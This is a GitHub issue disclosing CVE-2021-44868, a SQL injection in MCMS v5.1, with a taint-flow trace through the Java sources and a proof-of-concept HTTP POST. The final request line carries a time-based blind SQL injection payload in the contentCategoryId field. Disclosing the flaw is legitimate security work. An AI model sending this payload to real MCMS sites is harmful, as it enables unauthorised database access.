CVE-2021-44868: MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java has a SQL injection vulnerability · Issue #58 · ming-soft/MCMS
A problem was found in ming-soft MCMS v5.1. There is a SQL injection vulnerability in /ms/cms/content/list.do.
Vulnerability file:
/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java
Vulnerability tracking path:
1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java line 72 --The return value of the call to queryChildren() is tainted
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java line 72 --Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 168 --The return value of the call to queryChildren() is tainted
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 168 --Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 --Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 --Tainted value is assigned to variable column~iterator
7. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 --Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 175 --Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 181 --Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java line 52 --Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 181 --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java line 148 --Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java line 183 --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java line 77 --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml line 253 --categoryId: a risk of type SQLI is triggered, caused by the input parameter categoryId, value:
PoC:
POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close
contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'